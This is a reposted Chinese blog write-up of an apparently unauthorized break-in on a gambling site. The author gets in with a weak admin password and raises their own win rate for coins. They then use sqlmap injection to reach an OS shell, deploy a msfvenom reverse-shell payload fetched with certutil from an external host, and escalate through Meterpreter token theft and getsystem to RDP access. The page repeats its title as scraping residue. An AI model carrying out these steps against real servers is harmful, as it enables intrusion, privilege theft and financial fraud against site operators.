某棋牌站点注入到提权之路

华盟原创文章投稿奖励计划

某棋牌站点注入到提权之路

0x01 前言


某棋牌站点注入到提权之路在某某附近人发来送¥的邀请截图,在棋牌捕鱼上面把赠送的金额打光之后、随之来做个渗透测试….通过意见反馈打到后台地址以及cookie过期….之后某棋牌站点注入到提权之路

0x02 开始渗透

开局一个后台某棋牌站点注入到提权之路界面挺不错的有点高级高级的感觉,咱先来试试弱口令某棋牌站点注入到提权之路
咦….直接进去了。随后把账户的胜利调到了百分比某棋牌站点注入到提权之路某棋牌站点注入到提权之路打了一上午鱼之后,金币高达52w突然感觉好像有点什么不对,,,,咱是来做渗透的不是来捕鱼的吧渗透棋牌不登陆到服务器界面怎么合适呢某棋牌站点注入到提权之路咳咳…继续渗透后台没有上传点 配置文件也不知道路径在哪 …有点棘手我们回到登陆框 在账户上加个单引号试试看看有没有sqli某棋牌站点注入到提权之路嗯哼..点登陆没反应抓包sqlmap一把梭某棋牌站点注入到提权之路
嗯…很强 存在延时注入我们继续看看是否dba权限某棋牌站点注入到提权之路ture看来运气很好啊 直接–os-shell某棋牌站点注入到提权之路权限有点小啊 ,,,但问题不大 掏出我们的msf

msfvenom -p windows/meterpreter/reverse_tcp lhost="外网ip地址" lport="监听端口" -f exe > msf.exe 生成木马

放置外网方便使我们的目标服务器下载先在目标服务器创建一个放置木马的文件夹md c:test我们使用certutil.exe进行下载

certutil.exe -urlcache -split -f “木马下载地址” C:testtest.exe

某棋牌站点注入到提权之路木马下载成功我们回到msf设置使用exploit/multi/handler模块某棋牌站点注入到提权之路设置payload某棋牌站点注入到提权之路show options 看看需要配置的参数某棋牌站点注入到提权之路

set LHOST “外网ip” //于木马的ip一致set LPORT "端口" //于木马的监听端口一致

随后 run执行某棋牌站点注入到提权之路紧接着目标服务器运行木马某棋牌站点注入到提权之路
成功反弹shell某棋牌站点注入到提权之路
某棋牌站点注入到提权之路因为我们的权限太小所以我们现在要先进行提权使用use incognito来加载会话令牌模块然后list_tokens -u来列出会话令牌某棋牌站点注入到提权之路
使用impersonate_token “WIN-IGSV8O3CA7EAdministrator” 盗取 administrator 令牌 getuid查看一下某棋牌站点注入到提权之路
嘿嘿嘿 某棋牌站点注入到提权之路最最最后使用getsystem来获取system权限某棋牌站点注入到提权之路
咳咳 接下来就是shell进入某棋牌站点注入到提权之路cmd提取命令一把梭接下来就是快快乐乐的登陆远程服务器了美滋滋的~~某棋牌站点注入到提权之路(然而事情没那么简单~)咦….
某棋牌站点注入到提权之路
内部出现错误 咋回事了….难道远程端口被改了吗。。。。某棋牌站点注入到提权之路nmap出动扫描一下端口某棋牌站点注入到提权之路没有开放3389 …… 确定以及肯定是改端口了我们回到shell看看执行 tasklist /svc找到svchost.exe进程下termservice服务对应的PID某棋牌站点注入到提权之路再执行netstat -ano根据PID号查找对应远程端口,远程端口为5566端口某棋牌站点注入到提权之路嘿~这次能完美手工了吧
某棋牌站点注入到提权之路某棋牌站点注入到提权之路Very Good~ 某棋牌站点注入到提权之路

0x03 链接获取

文章来源:90sec社区(hs4cky)
原文链接:https://forum.90sec.com/t/topic/945

文章来源:排版:李白你好

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

某棋牌站点注入到提权之路

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容